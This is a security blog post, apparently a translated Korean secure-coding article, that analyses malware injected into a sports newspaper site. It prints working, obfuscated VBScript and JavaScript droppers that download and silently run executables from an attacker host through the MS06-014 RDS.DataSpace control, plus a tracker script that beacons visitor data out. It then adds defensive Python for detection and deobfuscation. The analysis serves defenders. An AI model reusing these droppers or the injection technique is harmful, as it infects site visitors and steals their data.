Hacking Team

Revealed Truth

Secure Coding Series - (2) Sites where malware lay in wait like a Lurker

Tiger Team  2016. 8. 11. 11:00

Every time I came across a site that malware had broken into I should have taken screenshots, but I never saved them because it felt like a chore, and I regret that badly now.
I would need to show evidence for anyone to believe this, but the posts I wrote on the AhnLab site over five years all vanished in a website overhaul, and they no longer turn up in search.
So let's go through a few pieces of evidence from sites where the malware Lurker had burrowed in and lay in wait, one at a time.
It sat in plain sight in the comics section of a sports newspaper site, as VBScript, as JavaScript, even as a keylogger. Just like a Lurker waiting for prey.
Wander the pages of a sports newspaper site the way a hyena roams the foothills looking for prey, and sooner or later a warning pops up that malware has been found.
PC Bitjaru (PC 빛자루) was an AhnLab service, now discontinued, whose name is a pun on "broom": it swept malware away. As the screenshot showed, it blocked the keylogger spyware. Ah, a real vitamin for my PC.
zzxy.vbs malware script

Its purpose is to download and run zzxy.exe.

To evade antivirus scanning, the whole second stage is spelled out character by character with chr() and handed to execute(); only the first two lines are readable.

' Stage 1 is readable: prepare a GET for the executable.
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://seoholo.cafe24.com/zzxy.exe",0
' Stage 2 is every character spelled out with chr() and run through execute().
execute(chr(120)&chr(80)&chr(111)&chr(115)&chr(116)&chr(46)&chr(83)&chr(101)&chr(110)&chr(100)&chr(40)&chr(41)&chr(13)&chr(10)&chr(83)&chr(101)&chr(116)&chr(32)&chr(115)&chr(71)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(65)&chr(68)&chr(79)&chr(68)&chr(66)&chr(46)&chr(83)&chr(116)&chr(114)&chr(101)&chr(97)&chr(109)&chr(34)&chr(41)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(77)&chr(111)&chr(100)&chr(101)&chr(32)&chr(61)&chr(32)&chr(51)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(84)&chr(121)&chr(112)&chr(101)&chr(32)&chr(61)&chr(32)&chr(49)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(79)&chr(112)&chr(101)&chr(110)&chr(40)&chr(41)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(87)&chr(114)&chr(105)&chr(116)&chr(101)&chr(40)&chr(120)&chr(80)&chr(111)&chr(115)&chr(116)&chr(46)&chr(114)&chr(101)&chr(115)&chr(112)&chr(111)&chr(110)&chr(115)&chr(101)&chr(66)&chr(111)&chr(100)&chr(121)&chr(41)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(83)&chr(97)&chr(118)&chr(101)&chr(84)&chr(111)&chr(70)&chr(105)&chr(108)&chr(101)&chr(32)&chr(34)&chr(67)&chr(58)&chr(92)&chr(78)&chr(84)&chr(68)&chr(69)&chr(84)&chr(66)&chr(67)&chr(84)&chr(46)&chr(101)&chr(120)&chr(101)&chr(34)&chr(44)&chr(50)&chr(32)&chr(13)&chr(10)&chr(119)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(115)&chr(108)&chr(101)&chr(101)&chr(112)&chr(32)&chr(49)&chr(48)&chr(48)&chr(48)&chr(32)&chr(13)&chr(10)&chr(119)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(99)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(111)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(119)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(115)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(46)&chr(114)&chr(117)&chr(110)&chr(32)&chr(34)&chr(67)&chr(58)&chr(92)&chr(78)&chr(84)&chr(68)&chr(69)&chr(84)&chr(66)&chr(67)&chr(84)&chr(46)&chr(101)&chr(120)&chr(101)&chr(34)&chr(44)&chr(49))
' The chr() chain above decodes to the following nine lines: send the request,
' write the response body to C:\NTDETBCT.exe through ADODB.Stream, wait a
' second, then run it from WScript.Shell (window style 1 = visible).
'   xPost.Send()
'   Set sGet = CreateObject("ADODB.Stream")
'   sGet.Mode = 3
'   sGet.Type = 1
'   sGet.Open()
'   sGet.Write(xPost.responseBody)
'   sGet.SaveToFile "C:\NTDETBCT.exe",2
'   wscript.sleep 1000
'   wscript.createobject("wscript.shell").run "C:\NTDETBCT.exe",1

Malware - ordinary HTML hidden as percent-escaped text

This is not Unicode but plain percent-encoding, the format JavaScript's unescape() reverses: %3Cscript language%3D%22VBScript%22%3E decodes to <script language="VBScript">. The page keeps the whole dropper in one escaped string and calls document.write(unescape(Words)) to inject it at load time, so a search of the page source for "VBScript" or "ADODB" turns up nothing.

<!-- the injected block: the whole dropper is one percent-escaped string, rebuilt and written into the page by document.write(unescape(...)) -->
<script>var Words="  %3Chtml%3E%0D%0A  %3Cscript language%3D%22VBScript%22%3E%0D%0A  on error resume next%0D%0A  dl %3D %22http%3A%2F%2Fseoholo%2Ecafe24%2Eco%2Ekr%2Fuuu%2Eexe%22%0D%0A  Set df %3D document%2EcreateElement%28%22object%22%29 %0D%0A  df%2EsetAttribute %22classid%22%2C %22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22  %0D%0A  str%3D%22Microsoft%2EXMLHTTP%22     %0D%0A  Set x %3D df%2ECreateObject%28str%2C%22%22%29  %0D%0A  a1%3D%22Ado%22 %0D%0A  a2%3D%22db%2E%22  %0D%0A  a3%3D%22Str%22  %0D%0A  a4%3D%22eam%22   %0D%0A  str1%3Da1%26a2%26a3%26a4   %0D%0A  str5%3Dstr1   %0D%0A  set S %3D df%2Ecreateobject%28str5%2C%22%22%29   %0D%0A  S%2Etype %3D 1    %0D%0A  str6%3D%22GET%22    %0D%0A  x%2EOpen str6%2C dl%2C False     %0D%0A  x%2ESend    %0D%0A  fname1%3D%22emtv%2Ecom%22 %0D%0A  set F %3D df%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29 %0D%0A  set tmp %3D F%2EGetSpecialFolder%282%29   %0D%0A  S%2Eopen   %0D%0A  fname1%3D F%2EBuildPath%28tmp%2Cfname1%29  %0D%0A  S%2Ewrite x%2EresponseBody   %0D%0A  S%2Esavetofile fname1%2C2   %0D%0A  set Q %3D df%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%22%29      %0D%0A  S%2Eclose %0D%0A  Q%2EShellExecute fname1%2C%22%22%2C%22%22%2C%22open%22%2C0   %0D%0A  %3C%2Fscript%3E   %0D%0A  %3Chead%3E   %0D%0A  %3Ctitle%3E攣瞳契瘻,헝된덤%3C%2Ftitle%3E  %0D%0A  %3C%2Fhead%3E%3Cbody%3E %0D%0A   %3Ccenter%3E攣瞳契瘻,헝된덤······· %3C%2Fcenter%3E%0D%0A  %3C%2Fbody%3E%3C%2Fhtml%3E%0D%0A";document.write(unescape(Words))</script>
<!-- new  -->
<script language='javascript' id='log_script' src='http://weblog004.cafe24.com/weblog.js?uid=woshifeng_8&uname=dreamwiz'></script>
<!-- new  -->

Decode the percent-escaped text back to VBScript and you get this ordinary-looking HTML page with an inline VBScript block (client-side script, not ASP; nothing here runs on the server). The capture below is a sibling variant rather than a byte-for-byte decode of the block above: it fetches zzxy.vbs instead of uuu.exe, loads xp.js in the body, and its tracking tag carries uid=woshifeng_11&uname=seoholo instead of woshifeng_8&uname=dreamwiz.

  <html>
  <script language="VBScript">
  on error resume next
  dl = "http://seoholo.cafe24.com/zzxy.vbs"
  ' An <object> with this CLSID (the RDS.DataSpace control, the MS06-014 vector)
  ' gives the script a CreateObject() that IE would otherwise refuse to it.
  Set df = document.createElement("object")
  df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  str="Microsoft.XMLHTTP"
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4        ' assembles "Adodb.Stream" so the name never appears whole
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1              ' binary stream
  str6="GET"
  x.Open str6, dl, False
  x.Send
  fname1="emtv.com"       ' a .com extension is still executable
  set F = df.createobject("Scripting.FileSystemObject","")
  set tmp = F.GetSpecialFolder(2)   ' 2 = temporary folder
  S.open
  fname1= F.BuildPath(tmp,fname1)
  S.write x.responseBody
  S.savetofile fname1,2             ' 2 = overwrite if it already exists
  set Q = df.createobject("Shell.Application","")
  S.close
  Q.ShellExecute fname1,"","","open",0   ' run the dropped file with a hidden window
  </script>
  <head>
  <title>攣瞳契瘻,헝된덤</title>
  </head><body> <script language=javascript src="xp.js"></script>
   <center>攣瞳契瘻,헝된덤······· </center>
  </body></html>
<script language='javascript' id='log_script' src='http://weblog004.cafe24.com/weblog.js?uid=woshifeng_11&uname=seoholo'></script>
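
A site owner who wants to find this kind of injection without eyeballing every page can look for the chain the sample uses: the RDS.DataSpace CLSID (MS06-014), Microsoft.XMLHTTP, ADODB.Stream, SaveToFile and Shell.Application, after first percent-decoding any string literal the page feeds to unescape(). The scanner below is an added example written for this page, not code from the post. The page it scans is constructed to mirror the decoded dropper above with the real hosts replaced by .example placeholders, the indicator list and the verdict rule are my own choices, and it decodes only one layer of escaping.

```python
import re
from urllib.parse import urlsplit

# Indicators, matched case-insensitively against the raw page and against a
# percent-decoded copy of every string literal it contains.  The CLSID is the
# RDS.DataSpace control (MS06-014): instantiating it through <object> hands the
# script a CreateObject() that plain VBScript/JScript in IE would not get.
INDICATORS = [(name, re.compile(pat, re.I)) for name, pat in [
    ("rds_dataspace_clsid",     r"BD96C556-65A3-11D0-983A-00C04FC29E36"),
    ("xmlhttp_download",        r"Microsoft\.XMLHTTP"),
    ("adodb_stream",            r"ADODB\.Stream"),
    ("save_to_file",            r"\.SaveToFile\b"),
    ("shell_application",       r"Shell\.Application"),
    ("shell_execute",           r"\.ShellExecute\b"),
    ("wscript_shell",           r"WScript\.Shell"),
    ("document_write_unescape", r"document\.write\s*\(\s*unescape\s*\("),
]]
EXE_URL    = re.compile(r"https?://[^\s\"'<>]+\.exe\b", re.I)
STR_LIT    = re.compile(r'"((?:[^"\\]|\\.)*)"')
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc=['\"]([^'\"]+)['\"]", re.I)
PCT        = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    """JavaScript unescape(): turn %XX and %uXXXX back into characters."""
    return PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decoded_layers(html):
    """The page itself plus one decoded copy of each percent-escaped literal."""
    return [html] + [js_unescape(lit) for lit in STR_LIT.findall(html) if "%" in lit]


def scan_page(html, site_host):
    """Return the indicators found, .exe URLs, off-site script tags and a verdict."""
    hits, urls = set(), []
    for text in decoded_layers(html):
        hits.update(name for name, rx in INDICATORS if rx.search(text))
        urls.extend(EXE_URL.findall(text))
    external = [src for src in SCRIPT_SRC.findall(html)
                if urlsplit(src).netloc and urlsplit(src).netloc != site_host]
    # The CLSID alone is damning.  Otherwise insist on the whole
    # download-write-execute chain so one "Shell.Application" in a legitimate
    # admin page does not trip the check.
    chain = ({"xmlhttp_download", "adodb_stream"} <= hits
             and bool(hits & {"shell_execute", "wscript_shell"}))
    return {
        "indicators": sorted(hits),
        "download_urls": list(dict.fromkeys(urls)),
        "external_scripts": external,
        "verdict": "rds_dataspace_clsid" in hits or chain,
    }


# Constructed sample page modelled on the decoded dropper above; the hosts are
# placeholders, not the ones from the captures.
SAMPLE_PAGE = (
    "<html><body><h1>Today's comics</h1>\n"
    '<script>var Words="%3Cscript language%3D%22VBScript%22%3E%0D%0A'
    "Set df %3D document%2EcreateElement%28%22object%22%29%0D%0A"
    "df%2EsetAttribute %22classid%22%2C %22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A"
    "Set x %3D df%2ECreateObject%28%22Microsoft%2EXMLHTTP%22%2C%22%22%29%0D%0A"
    "x%2EOpen %22GET%22%2C %22http%3A%2F%2Fdropper%2Eexample%2Fuuu%2Eexe%22%2C False%0D%0A"
    "set S %3D df%2Ecreateobject%28%22Adodb%2EStream%22%2C%22%22%29%0D%0A"
    "S%2Esavetofile fname1%2C2%0D%0A"
    "set Q %3D df%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%22%29%0D%0A"
    "Q%2EShellExecute fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A"
    '%3C%2Fscript%3E";document.write(unescape(Words))</script>\n'
    "<script language='javascript' id='log_script' src='http://weblog.example/weblog.js?uid=x'></script>\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    for key, value in scan_page(SAMPLE_PAGE, "sports.example").items():
        print(f"{key}: {value}")
```

Run over a crawl of your own site, the three fields worth alerting on are the verdict, the .exe URLs (the dropper host to block) and the off-site script tags (the operator's tracker, which in the capture above also carried the attacker's account name). Multiple escaping layers, or a payload assembled from DOM values at run time, need an actual interpreter rather than this static pass.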

The xp.js malware linked from that page

Its purpose is to download and run 6511.exe.

To evade antivirus scanning, every telling string is chopped into fragments and reassembled at run time, some of them inside eval().

var filename="DNS.exe";    // file name (the original comment here is mojibake of a Chinese comment)
var url="http://seoholo.cafe24.com/6511.exe";
var obj=document.createElement("object");
obj.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");   // same RDS.DataSpace control as the VBScript variant
var str="Microsoft.XMLHTTP";
var xmlhttp=obj.CreateObject(str,"");
var adob=obj.createobject("AD"+"OD"+"B.Stream","");    // "ADODB.Stream" assembled from fragments
adob.Type=1;                                           // binary stream
eval('xmlhttp.op'+'en("GET",url,false)');   // xmlhttp.open("GET", url, false); assembled, then eval'd
eval("xmlh"+"ttp.send()");                  // xmlhttp.send();
eval("adob.Op"+"en()");                     // adob.Open();
var f=obj.createobject("Scripting.FileSystemObject","");
var fname=filename;
var tmp=f.GetSpecialFolder(1);              // 1 = system folder, so the file lands in %SystemRoot%\system32\DNS.exe
fname=f.BuildPath(tmp,fname);
eval("adob.w"+"rite(xmlhtt"+"p.respo"+"nseBody)");    // adob.write(xmlhttp.responseBody);
adob.SaveToFile(fname,2);                   // 2 = overwrite
adob.Close();
var runc=obj.createobject("She"+"ll.Appl"+"ication","");     // "Shell.Application" assembled from fragments
eval('runc.She'+'llExe'+'cute(fname,"","","open",0)');      // runc.ShellExecute(fname,"","","open",0); hidden window
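
All three samples hide the same handful of COM names, and each layer is mechanical enough to undo offline: the zzxy.vbs second stage is a chr() chain, the HTML page builds "Adodb.Stream" from four constants joined with &, and xp.js glues "xmlh"+"ttp" fragments together and hands them to eval(). The helpers below strip those layers statically, without executing any of the script. They are an added example written for this page, not code from the post; the two sample inputs are constructed excerpts of the scripts above (the real chr() chain is much longer), and the regex-based joining is meant for reading a decoded sample, not for producing code that runs again.

```python
import re

# VBScript: chr(120)&chr(80)&... chains, and constants glued together with &.
CHR_CALL  = re.compile(r"chr\(\s*(\d+)\s*\)", re.I)
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*&\s*chr\(\s*\d+\s*\))+", re.I)
VB_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"]|"")*)"\s*$')
VB_JOIN   = re.compile(r"^\s*(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)*)\s*$")
# JScript: "xmlh"+"ttp" fragments, and eval("...") applied to the result.
JS_CONCAT = re.compile(r"""(["'])((?:(?!\1).)*)\1\s*\+\s*(["'])((?:(?!\3).)*)\3""")
JS_EVAL   = re.compile(r"""eval\(\s*(["'])((?:(?!\1).)*)\1\s*\)""")


def decode_chr_chain(expr):
    """chr(120)&chr(80)&... -> the string the chain builds."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(expr))


def expand_chr_chains(vbs):
    """Replace every chr() chain with the text it builds, so that
    execute(chr(...)&chr(...)) reads as execute(<the second stage>).
    Output is for reading, not re-running: the literal is left unquoted."""
    return CHR_CHAIN.sub(lambda m: decode_chr_chain(m.group(0)), vbs)


def fold_vb_constants(vbs):
    """Propagate x="lit" assignments through y=a&b&c lines (case-insensitive,
    as VBScript names are) so Adodb.Stream appears whole next to its use."""
    consts, out = {}, []
    for line in vbs.splitlines():
        m = VB_ASSIGN.match(line)
        if m:
            consts[m.group(1).lower()] = m.group(2).replace('""', '"')
            out.append(line)
            continue
        m = VB_JOIN.match(line)
        if m:
            parts = [p.strip().lower() for p in m.group(2).split("&")]
            if all(p in consts for p in parts):
                value = "".join(consts[p] for p in parts)
                consts[m.group(1).lower()] = value
                out.append('%s="%s"  \' folded' % (m.group(1), value.replace('"', '""')))
                continue
        out.append(line)
    return "\n".join(out)


def deobfuscate_js(js):
    """Join "a"+"b" literals until nothing changes, then unwrap eval("...")."""
    prev = None
    while prev != js:
        prev = js
        js = JS_CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), js)
    return JS_EVAL.sub(lambda m: m.group(2), js)


# Constructed excerpts modelled on the samples above (the real chr() chain is
# far longer; this one spells out only its first two lines).
VBS_SAMPLE = (
    "execute(chr(120)&chr(80)&chr(111)&chr(115)&chr(116)&chr(46)&chr(83)&chr(101)"
    "&chr(110)&chr(100)&chr(40)&chr(41)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)"
    "&chr(116)&chr(46)&chr(77)&chr(111)&chr(100)&chr(101)&chr(32)&chr(61)&chr(32)&chr(51))\n"
    'a1="Ado"\na2="db."\na3="Str"\na4="eam"\nstr1=a1&a2&a3&a4\nstr5=str1\n'
    'set S = df.createobject(str5,"")\n'
)
JS_SAMPLE = (
    'var adob=obj.createobject("AD"+"OD"+"B.Stream","");\n'
    "eval('xmlhttp.op'+'en(\"GET\",url,false)');\n"
    'eval("xmlh"+"ttp.send()");\n'
    'eval("adob.w"+"rite(xmlhtt"+"p.respo"+"nseBody)");\n'
    'var runc=obj.createobject("She"+"ll.Appl"+"ication","");\n'
)

if __name__ == "__main__":
    print(fold_vb_constants(expand_chr_chains(VBS_SAMPLE)))
    print(deobfuscate_js(JS_SAMPLE))
```

Run stand-alone it prints the two excerpts with the COM names and the download-write-execute calls restored. Anything built at run time from DOM values, or nested more than one eval() deep, needs an interpreter (a sandboxed cscript run, for instance) rather than this static pass.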


weblog.js malware script: the tracker loaded by the injected log_script tag. It recovers uid= and uname= from its own src attribute, collects the referrer, screen size and page URL, and rewrites the tag's src to log.php with all of it, which lets the operator count and locate infected visitors.

var s_uid;var s_uname;var ref;var doc_uid;var src_path;
// Read this script tag's own src attribute to recover uid= and uname=
// (document.all is the IE path; the else branch is a non-IE fallback).
if (document.all) {
  src_path = document.all.log_script.src;
} else {
  src_path = document.log_script.src;
}
var uid_end = src_path.lastIndexOf("uid=",src_path);
var uname_start = src_path.indexOf("uname=",src_path);
var uname_end = src_path.lastIndexOf("uname=",src_path);
s_uid=src_path.substring(uid_end+4,uname_start-1);
s_uname=src_path.substring(uname_end+6,src_path.length);
var s_url = document.URL;
// Work out where the visitor came from, trying the opener and parent frames too.
if (document.referrer) {
  ref=document.referrer;
} else {
  if (typeof(opener) == "object") {
    if (typeof(opener.document) != "unknown") {
      ref = opener.document.URL;
    }
  }
  if (! ref) {
    if (typeof(parent) == "object" ) {
      if (typeof(parent.document) != "unknown") {
        ref = parent.document.referrer;
      }
    }
    if (! ref) {
      if (typeof(parent.opener) == "object" ) {
        if (typeof(parent.opener.document) != "unknown") {
          ref = parent.opener.document.referrer;
        }
      }
    }
  }
}
if (! ref) {
  if (typeof(opener) == "object" ) {
    if (typeof(opener.parent) == "object" ) {
      if (typeof(opener.parent.document) != "unknown") {
        ref = opener.parent.document.referrer;
      }
    }
  }
}
// Swap the tag's src for the beacon URL: uid, screen size, referrer, account
// name and the infected page's URL all go to log.php on the operator's host.
if (document.all) {
  doc_uid=s_uid+'&udim='+window.screen.width+'*'+window.screen.height+'&uref='+ref+'&uname='+s_uname+'&url='+s_url;
  document.all.log_script.src='http://weblog004.cafe24.com/log.php?uid='+doc_uid;
} else {
  doc_uid=s_uid+'&udim='+window.screen.width+'*'+window.screen.height+'&uref='+ref+'&uname='+s_uname+'&url='+s_url;
  document.log_script.src='http://weblog004.cafe24.com/log.php?uid='+doc_uid;
}

To be continued.
